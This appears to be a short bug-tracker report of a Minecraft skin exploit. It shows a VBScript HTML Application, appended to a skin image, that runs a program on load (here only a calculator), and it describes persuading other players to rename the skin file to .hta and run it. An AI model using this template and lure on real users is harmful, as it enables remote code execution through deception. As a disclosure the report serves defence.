WEB-873RCE using Social Engineering with modified skins
You can have an HTML-Application (.hta) like:
<html> <head> <script language="VBScript"> Sub DoTheThing Set objshell = CreateObject("Wscript.Shell") objshell.Run "calc" self.close() End Sub </script> </head> <body onload="DoTheThing"> </body> </html>
and append it to your Skin image and then you can go on Skype, etc. to tell any victim who was on the same server as you to rename your skin file (in .minecraft/assets) into something.hta and run it, which can then be used to do all sorts of bad things.
I have been made aware of this exploit in this (german) video: https://www.youtube.com/watch?v=BGC5oUcK5Z0
It showcases how to set up the file and skin and how to (ab)use this.
